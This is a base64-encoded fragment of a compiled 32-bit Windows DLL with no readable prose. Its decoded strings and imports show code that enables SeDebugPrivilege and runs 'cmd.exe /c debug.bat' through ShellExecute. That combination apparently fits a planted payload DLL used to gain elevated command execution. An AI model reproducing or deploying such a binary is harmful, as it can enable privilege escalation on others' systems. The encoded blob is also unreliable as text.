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LQAgAEEAdAB0AGUAbQBwAHQAIAB0AG8AIAB1AHMAZQAgAE0AUwBJAEwAIABjAG8AZABlACAAZgByAG8AbQAgAHQAaABpAHMAIABhAHMAcwBlAG0AYgBsAHkAIABkAHUAcgBpAG4AZwAgAG4AYQB0AGkAdgBlACAAYwBvAGQAZQAgAGkAbgBpAHQAaQBhAGwAaQB6AGEAdABpAG8AbgAKAFQAaABpAHMAIABpAG4AZABpAGMAYQB0AGUAcwAgAGEAIABiAHUAZwAgAGkAbgAgAHkAbwB1AHIAIABhAHAAcABsAGkAYwBhAHQAaQBvAG4ALgAgAEkAdAAgAGkAcwAgAG0AbwBzAHQAIABsAGkAawBlAGwAeQAgAHQAaABlACAAcgBlAHMAdQBsAHQAIABvAGYAIABjAGEAbABsAGkAbgBnACAAYQBuACAATQBTAEkATAAtAGMAbwBtAHAAaQBsAGUAZAAgACgALwBjAGwAcgApACAAZgB1AG4AYwB0AGkAbwBuACAAZgByAG8AbQAgAGEAIABuAGEAdABpAHYAZQAgAGMAbwBuAHMAdAByAHUAYwB0AG8AcgAgAG8AcgAgAGYAcgBvAG0AIABEAGwAbABNAGEAaQBuAC4ADQAKAAAAAABSADYAMAAzADIADQAKAC0AIABuAG8AdAAgAGUAbgBvAHUAZwBoACAAcwBwAGEAYwBlACAAZgBvAHIAIABsAG8AYwBhAGwAZQAgAGkAbgBmAG8AcgBtAGEAdABpAG8AbgANAAoAAAAAAFIANgAwADMAMQANAAoALQAgAEEAdAB0AGUAbQBwAHQAIAB0AG8AIABpAG4AaQB0AGkAYQBsAGkAegBlACAAdABoAGUAIABDAFIAVAAgAG0AbwByAGUAIAB0AGgAYQBuACAAbwBuAGMAZQAuAAoAVABoAGkAcwAgAGkAbgBkAGkAYwBhAHQAZQBzACAAYQAgAGIAdQBnACAAaQBuACAAeQBvAHUAcgAgAGEAcABwAGwAaQBjAGEAdABpAG8AbgAuAA0ACgAAAAAAUgA2ADAAMwAwAA0ACgAtACAAQwBSAFQAIABuAG8AdAAgAGkAbgBpAHQAaQBhAGwAaQB6AGUAZAANAAoAAAAAAFIANgAwADIAOAANAAoALQAgAHUAbgBhAGIAbABlACAAdABvACAAaQBuAGkAdABpAGEAbABpAHoAZQAgAGgAZQBhAHAADQAKAAAAAAAAAAAAUgA2ADAAMgA3AA0ACgAtACAAbgBvAHQAIABlAG4AbwB1AGcAaAAgAHMAcABhAGMAZQAgAGYAbwByACAAbABvAHcAaQBvACAAaQBuAGkAdABpAGEAbABpAHoAYQB0AGkAbwBuAA0ACgAAAAAAAAAAAFIANgAwADIANgANAAoALQAgAG4AbwB0ACAAZQBuAG8AdQBnAGgAIABzAHAAYQBjAGUAIABmAG8AcgAgAHMAdABkAGkAbwAgAGkAbgBpAHQAaQBhAGwAaQB6AGEAdABpAG8AbgANAAoAAAAAAAAAAABSADYAMAAyADUADQAKAC0AIABwAHUAcgBlACAAdgBpAHIAdAB1AGEAbAAgAGYAdQBuAGMAdABpAG8AbgAgAGMAYQBsAGwADQAKAAAAAAAAAFIANgAwADIANAANAAoALQAgAG4AbwB0ACAAZQBuAG8AdQBnAGgAIABzAHAAYQBjAGUAIABmAG8AcgAgAF8AbwBuAGUAeABpAHQALwBhAHQAZQB4AGkAdAAgAHQAYQBiAGwAZQANAAoAAAAAAAAAAABSADYAMAAxADkADQAKAC0AIAB1AG4AYQBiAGwAZQAgAHQAbwAgAG8AcABlAG4AIABjAG8AbgBzAG8AbABlACAAZABlAHYAaQBjAGUADQAKAAAAAAAAAAAAUgA2ADAAMQA4AA0ACgAtACAAdQBuAGUAeABwAGUAYwB0AGUAZAAgAGgAZQBhAHAAIABlAHIAcgBvAHIADQAKAAAAAAAAAAAAUgA2ADAAMQA3AA0ACgAtACAAdQBuAGUAeABwAGUAYwB0AGUAZAAgAG0AdQBsAHQAaQB0AGgAcgBlAGEAZAAgAGwAbwBjAGsAIABlAHIAcgBvAHIADQAKAAAAAAAAAAAAUgA2ADAAMQA2AA0ACgAtACAAbgBvAHQAIABlAG4AbwB1AGcAaAAgAHMAcABhAGMAZQAgAGYAbwByACAAdABoAHIAZQBhAGQAIABkAGEAdABhAA0ACgAAAFIANgAwADEAMAANAAoALQAgAGEAYgBvAHIAdAAoACkAIABoAGEAcwAgAGIAZQBlAG4AIABjAGEAbABsAGUAZAANAAoAAAAAAFIANgAwADAAOQANAAoALQAgAG4AbwB0ACAAZQBuAG8AdQBnAGgAIABzAHAAYQBjAGUAIABmAG8AcgAgAGUAbgB2AGkAcgBvAG4AbQBlAG4AdAANAAoAAABSADYAMAAwADgADQAKAC0AIABuAG8AdAAgAGUAbgBvAHUAZwBoACAAcwBwAGEAYwBlACAAZgBvAHIAIABhAHIAZwB1AG0AZQBuAHQAcwANAAoAAAAAAAAAUgA2ADAAMAAyAA0ACgAtACAAZgBsAG8AYQB0AGkAbgBnACAAcABvAGkAbgB0ACAAcwB1AHAAcABvAHIAdAAgAG4AbwB0ACAAbABvAGEAZABlAGQADQAKAAAAAAAAAAAAAgAAACBuABAIAAAAyG0AEAkAAABwbQAQCgAAAChtABAQAAAA0GwAEBEAAABwbAAQEgAAAChsABATAAAA0GsAEBgAAABgawAQGQAAABBrABAaAAAAoGoAEBsAAAAwagAQHAAAAOBpABAeAAAAoGkAEB8AAADYaAAQIAAAAHBoABAhAAAAgGYAEHgAAABgZgAQeQAAAERmABB6AAAAKGYAEPwAAAAgZgAQ/wAAAABmABBNAGkAYwByAG8AcwBvAGYAdAAgAFYAaQBzAHUAYQBsACAAQwArACsAIABSAHUAbgB0AGkAbQBlACAATABpAGIAcgBhAHIAeQAAAAAACgAKAAAAAAAuAC4ALgAAADwAcAByAG8AZwByAGEAbQAgAG4AYQBtAGUAIAB1AG4AawBuAG8AdwBuAD4AAAAAAFIAdQBuAHQAaQBtAGUAIABFAHIAcgBvAHIAIQAKAAoAUAByAG8AZwByAGEAbQA6ACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAgACAAIAAgACAAIAAgACAAKAAoACgAKAAoACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEgAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAhACEAIQAhACEAIQAhACEAIQAhAAQABAAEAAQABAAEAAQAIEAgQCBAIEAgQCBAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQAQABAAEAAQABAAEACCAIIAggCCAIIAggACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAEAAQABAAEAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAIAAgACAAIAAgACAAIAAgAGgAKAAoACgAKAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABIABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQAIQAhACEAIQAhACEAIQAhACEAIQAEAAQABAAEAAQABAAEACBAYEBgQGBAYEBgQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBEAAQABAAEAAQABAAggGCAYIBggGCAYIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECARAAEAAQABAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAASAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAFAAUABAAEAAQABAAEAAUABAAEAAQABAAEAAQAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEQAAEBAQEBAQEBAQEBAQEBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBEAACAQIBAgECAQIBAgECAQIBAQEAAAAAgIGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmJmam5ydnp+goaKjpKWmp6ipqqusra6vsLGys7S1tre4ubq7vL2+v8DBwsPExcbHyMnKy8zNzs/Q0dLT1NXW19jZ2tvc3d7f4OHi4+Tl5ufo6err7O3u7/Dx8vP09fb3+Pn6+/z9/v8AAQIDBAUGBwgJCgsMDQ4PEBESExQVFhcYGRobHB0eHyAhIiMkJSYnKCkqKywtLi8wMTIzNDU2Nzg5Ojs8PT4/QGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6W1xdXl9gYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXp7fH1+f4CBgoOEhYaHiImKi4yNjo+QkZKTlJWWl5iZmpucnZ6foKGio6SlpqeoqaqrrK2ur7CxsrO0tba3uLm6u7y9vr/AwcLDxMXGx8jJysvMzc7P0NHS09TV1tfY2drb3N3e3+Dh4uPk5ebn6Onq6+zt7u/w8fLz9PX29/j5+vv8/f7/gIGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmJmam5ydnp+goaKjpKWmp6ipqqusra6vsLGys7S1tre4ubq7vL2+v8DBwsPExcbHyMnKy8zNzs/Q0dLT1NXW19jZ2tvc3d7f4OHi4+Tl5ufo6err7O3u7/Dx8vP09fb3+Pn6+/z9/v8AAQIDBAUGBwgJCgsMDQ4PEBESExQVFhcYGRobHB0eHyAhIiMkJSYnKCkqKywtLi8wMTIzNDU2Nzg5Ojs8PT4/QEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaW1xdXl9gQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVp7fH1+f4CBgoOEhYaHiImKi4yNjo+QkZKTlJWWl5iZmpucnZ6foKGio6SlpqeoqaqrrK2ur7CxsrO0tba3uLm6u7y9vr/AwcLDxMXGx8jJysvMzc7P0NHS09TV1tfY2drb3N3e3+Dh4uPk5ebn6Onq6+zt7u/w8fLz9PX29/j5+vv8/f7/R2V0UHJvY2Vzc1dpbmRvd1N0YXRpb24AR2V0VXNlck9iamVjdEluZm9ybWF0aW9uVwAAAEdldExhc3RBY3RpdmVQb3B1cAAAR2V0QWN0aXZlV2luZG93AE1lc3NhZ2VCb3hXAFUAUwBFAFIAMwAyAC4ARABMAEwAAAAAACBDb21wbGV0ZSBPYmplY3QgTG9jYXRvcicAAAAgQ2xhc3MgSGllcmFyY2h5IERlc2NyaXB0b3InAAAAACBCYXNlIENsYXNzIEFycmF5JwAAIEJhc2UgQ2xhc3MgRGVzY3JpcHRvciBhdCAoACBUeXBlIERlc2NyaXB0b3InAAAAYGxvY2FsIHN0YXRpYyB0aHJlYWQgZ3VhcmQnAGBtYW5hZ2VkIHZlY3RvciBjb3B5IGNvbnN0cnVjdG9yIGl0ZXJhdG9yJwAAYHZlY3RvciB2YmFzZSBjb3B5IGNvbnN0cnVjdG9yIGl0ZXJhdG9yJwAAAABgdmVjdG9yIGNvcHkgY29uc3RydWN0b3IgaXRlcmF0b3InAABgZHluYW1pYyBhdGV4aXQgZGVzdHJ1Y3RvciBmb3IgJwAAAABgZHluYW1pYyBpbml0aWFsaXplciBmb3IgJwAAYGVoIHZlY3RvciB2YmFzZSBjb3B5IGNvbnN0cnVjdG9yIGl0ZXJhdG9yJwBgZWggdmVjdG9yIGNvcHkgY29uc3RydWN0b3IgaXRlcmF0b3InAAAAYG1hbmFnZWQgdmVjdG9yIGRlc3RydWN0b3IgaXRlcmF0b3InAAAAAGBtYW5hZ2VkIHZlY3RvciBjb25zdHJ1Y3RvciBpdGVyYXRvcicAAABgcGxhY2VtZW50IGRlbGV0ZVtdIGNsb3N1cmUnAAAAAGBwbGFjZW1lbnQgZGVsZXRlIGNsb3N1cmUnAABgb21uaSBjYWxsc2lnJwAAIGRlbGV0ZVtdAAAAIG5ld1tdAABgbG9jYWwgdmZ0YWJsZSBjb25zdHJ1Y3RvciBjbG9zdXJlJwBgbG9jYWwgdmZ0YWJsZScAYFJUVEkAAABgRUgAYHVkdCByZXR1cm5pbmcnAGBjb3B5IGNvbnN0cnVjdG9yIGNsb3N1cmUnAABgZWggdmVjdG9yIHZiYXNlIGNvbnN0cnVjdG9yIGl0ZXJhdG9yJwAAYGVoIHZlY3RvciBkZXN0cnVjdG9yIGl0ZXJhdG9yJwBgZWggdmVjdG9yIGNvbnN0cnVjdG9yIGl0ZXJhdG9yJwAAAABgdmlydHVhbCBkaXNwbGFjZW1lbnQgbWFwJwAAYHZlY3RvciB2YmFzZSBjb25zdHJ1Y3RvciBpdGVyYXRvcicAYHZlY3RvciBkZXN0cnVjdG9yIGl0ZXJhdG9yJwAAAABgdmVjdG9yIGNvbnN0cnVjdG9yIGl0ZXJhdG9yJwAAAGBzY2FsYXIgZGVsZXRpbmcgZGVzdHJ1Y3RvcicAAAAAYGRlZmF1bHQgY29uc3RydWN0b3IgY2xvc3VyZScAAABgdmVjdG9yIGRlbGV0aW5nIGRlc3RydWN0b3InAAAAAGB2YmFzZSBkZXN0cnVjdG9yJwAAYHN0cmluZycAAAAAYGxvY2FsIHN0YXRpYyBndWFyZCcAAAAAYHR5cGVvZicAAAAAYHZjYWxsJwBgdmJ0YWJsZScAAABgdmZ0YWJsZScAAABePQAAfD0AACY9AAA8PD0APj49ACU9AAAvPQAALT0AACs9AAAqPQAAfHwAACYmAAB8AAAAXgAAAH4AAAAoKQAALAAAAD49AAA+AAAAPD0AADwAAAAlAAAALwAAAC0+KgAmAAAAKwAAAC0AAAAtLQAAKysAACoAAAAtPgAAb3BlcmF0b3IAAAAAW10AACE9AAA9PQAAIQAAADw8AAA+PgAAPQAAACBkZWxldGUAIG5ldwAAAABfX3VuYWxpZ25lZABfX3Jlc3RyaWN0AABfX3B0cjY0AF9fZWFiaQAAX19jbHJjYWxsAAAAX19mYXN0Y2FsbAAAX190aGlzY2FsbAAAX19zdGRjYWxsAAAAX19wYXNjYWwAAAAAX19jZGVjbABfX2Jhc2VkKAAAAAAMfgAQBH4AEPh9ABDsfQAQ4H0AENR9ABDIfQAQwH0AELh9ABCsfQAQoH0AEJ19ABCYfQAQkH0AEIx9ABCIfQAQhH0AEIB9ABB8fQAQeH0AEHR9ABBofQAQZH0AEGB9ABBcfQAQWH0AEFR9ABBQfQAQTH0AEEh9ABBEfQAQQH0AEDx9ABA4fQAQNH0AEDB9ABAsfQAQKH0AECR9ABAgfQAQHH0AEBh9ABAUfQAQEH0AEAx9ABAIfQAQBH0AEAB9ABD8fAAQ+HwAEPR8ABDwfAAQ7HwAEOB8ABDUfAAQzHwAEMB8ABCofAAQnHwAEIh8ABBofAAQSHwAECh8ABAIfAAQ6HsAEMR7ABCoewAQhHsAEGR7ABA8ewAQIHsAEBB7ABAMewAQBHsAEPR6ABDQegAQyHoAELx6ABCsegAQkHoAEHB6ABBIegAQIHoAEPh5ABDMeQAQsHkAEIx5ABBoeQAQPHkAEBB5ABD0eAAQnX0AEOB4ABDEeAAQsHgAEJB4ABB0eAAQAAAAAAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0+P0BBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWltcXV5fYGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6e3x9fn8AU2VEZWJ1Z1ByaXZpbGVnZQAAAAAAAAAAL2MgZGVidWcuYmF0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAAAAAAYzpcd2luZG93c1xzeXN0ZW0zMlxjbWQuZXhlAG9wZW4AAAAASAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJAAEOCBABADAAAAAAAAAAAAAAAAAAAACJAAEAyBABAAAAAAAAAAAAIAAAAcgQAQKIEAEESBABAAAAAACJAAEAEAAAAAAAAA/////wAAAABAAAAADIEAECSQABAAAAAAAAAAAP////8AAAAAQAAAAGCBABAAAAAAAAAAAAEAAABwgQAQRIEAEAAAAAAAAAAAAAAAAAAAAAAkkAAQYIEAEAAAAAAAAAAAAAAAAJCQABCggQAQAAAAAAAAAAABAAAAsIEAELiBABAAAAAAkJAAEAAAAAAAAAAA/////wAAAABAAAAAoIEAEAAAAAAAAAAAAAAAAGAlAADwQwAAEFYAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/v///wAAAADY////AAAAAP7///8AAAAA2REAEAAAAAD+////AAAAANT///8AAAAA/v///zkTABBKEwAQAAAAAIUUABAAAAAATIIAEAIAAABYggAQdIIAEAAAAAAIkAAQAAAAAP////8AAAAADAAAALcUABAAAAAAJJAAEAAAAAD/////AAAAAAwAAADrKQAQ/v///wAAAADY////AAAAAP7///8AAAAAcxYAEP7///8AAAAAghYAEP7///8AAAAA2P///wAAAAD+////AAAAADUYABD+////AAAAAEEYABD+////AAAAAMD///8AAAAA/v///wAAAAC9HQAQAAAAAP7///8AAAAA1P///wAAAAD+////AAAAAGkrABAAAAAA/v///wAAAADU////AAAAAP7///8AAAAADi4AEAAAAAD+////AAAAANT///8AAAAA/v///wAAAAB3MQAQAAAAAP7///8AAAAA1P///wAAAAD+////AAAAAD40ABAAAAAA/v///wAAAADM////AAAAAP7///8AAAAAlzgAEAAAAAD+////AAAAANj///8AAAAA/v///5I6ABCWOgAQAAAAAP7///8AAAAAwP///wAAAAD+////AAAAAH88ABAAAAAA/v///wAAAADY////AAAAAP7///+7PwAQzj8AEAAAAAD+////AAAAANT///8AAAAA/v///wAAAAAZRQAQfIQAAAAAAAAAAAAAloUAABBgAABshAAAAAAAAAAAAADohQAAAGAAAGSFAAAAAAAAAAAAAAaGAAD4YAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQhQAAuIUAAKSFAAAAAAAAiIUAAICFAABshQAAEoYAACiGAAA4hgAASoYAAF6GAAB6hgAAmIYAAKyGAAC8hgAAyIYAANaGAADkhgAA7oYAAAaHAAAahwAAKocAADqHAABShwAAZIcAAHCHAAB+hwAAkIcAAKCHAADIhwAA1ocAAOiHAAAAiAAAFogAADCIAABGiAAAYIgAAG6IAAB8iAAAlogAAKaIAAC8iAAA1ogAAOKIAAD0iAAADIkAACSJAAAwiQAAOokAAEaJAABYiQAAZokAAHaJAACCiQAAmIkAAKSJAACwiQAAwIkAANaJAADoiQAAAAAAAPaFAAAAAAAAwAFHZXRDdXJyZW50UHJvY2VzcwCyBFNsZWVwAFIAQ2xvc2VIYW5kbGUAS0VSTkVMMzIuZGxsAAD3AU9wZW5Qcm9jZXNzVG9rZW4AAJYBTG9va3VwUHJpdmlsZWdlVmFsdWVBAB8AQWRqdXN0VG9rZW5Qcml2aWxlZ2VzAEFEVkFQSTMyLmRsbAAAHgFTaGVsbEV4ZWN1dGVBAFNIRUxMMzIuZGxsAMUBR2V0Q3VycmVudFRocmVhZElkAADKAERlY29kZVBvaW50ZXIAhgFHZXRDb21tYW5kTGluZUEAwARUZXJtaW5hdGVQcm9jZXNzAADTBFVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgAApQRTZXRVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAAANJc0RlYnVnZ2VyUHJlc2VudADqAEVuY29kZVBvaW50ZXIAxQRUbHNBbGxvYwAAxwRUbHNHZXRWYWx1ZQDIBFRsc1NldFZhbHVlAMYEVGxzRnJlZQDvAkludGVybG9ja2VkSW5jcmVtZW50AAAYAkdldE1vZHVsZUhhbmRsZVcAAHMEU2V0TGFzdEVycm9yAAACAkdldExhc3RFcnJvcgAA6wJJbnRlcmxvY2tlZERlY3JlbWVudAAARQJHZXRQcm9jQWRkcmVzcwAAzwJIZWFwRnJlZQAAGQFFeGl0UHJvY2VzcwBvBFNldEhhbmRsZUNvdW50AABkAkdldFN0ZEhhbmRsZQAA4wJJbml0aWFsaXplQ3JpdGljYWxTZWN0aW9uQW5kU3BpbkNvdW50APMBR2V0RmlsZVR5cGUAYwJHZXRTdGFydHVwSW5mb1cA0QBEZWxldGVDcml0aWNhbFNlY3Rpb24AEwJHZXRNb2R1bGVGaWxlTmFtZUEAAGEBRnJlZUVudmlyb25tZW50U3RyaW5nc1cAEQVXaWRlQ2hhclRvTXVsdGlCeXRlANoBR2V0RW52aXJvbm1lbnRTdHJpbmdzVwAAzQJIZWFwQ3JlYXRlAADOAkhlYXBEZXN0cm95AKcDUXVlcnlQZXJmb3JtYW5jZUNvdW50ZXIAkwJHZXRUaWNrQ291bnQAAMEBR2V0Q3VycmVudFByb2Nlc3NJZAB5AkdldFN5c3RlbVRpbWVBc0ZpbGVUaW1lAMsCSGVhcEFsbG9jALEDUmFpc2VFeGNlcHRpb24AADkDTGVhdmVDcml0aWNhbFNlY3Rpb24AAO4ARW50ZXJDcml0aWNhbFNlY3Rpb24AAHIBR2V0Q1BJbmZvAGgBR2V0QUNQAAA3AkdldE9FTUNQAAAKA0lzVmFsaWRDb2RlUGFnZQDSAkhlYXBSZUFsbG9jAD8DTG9hZExpYnJhcnlXAAAlBVdyaXRlRmlsZQAUAkdldE1vZHVsZUZpbGVOYW1lVwAAGARSdGxVbndpbmQA1AJIZWFwU2l6ZQAALQNMQ01hcFN0cmluZ1cAAGcDTXVsdGlCeXRlVG9XaWRlQ2hhcgBpAkdldFN0cmluZ1R5cGVXAAAEA0lzUHJvY2Vzc29yRmVhdHVyZVByZXNlbnQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAE7mQLuxGb9EjGIAEAAAAAAuP0FWYmFkX2FsbG9jQHN0ZEBAAIxiABAAAAAALj9BVmV4Y2VwdGlvbkBzdGRAQAD///////////////+ACgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIxiABAAAAAALj9BVnR5cGVfaW5mb0BAAAAAAAABAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEMAAAAAAAAA/GUAEPhlABD0ZQAQ8GUAEOxlABDoZQAQ5GUAENxlABDUZQAQzGUAEMBlABC0ZQAQrGUAEKBlABCcZQAQmGUAEJRlABCQZQAQjGUAEIhlABCEZQ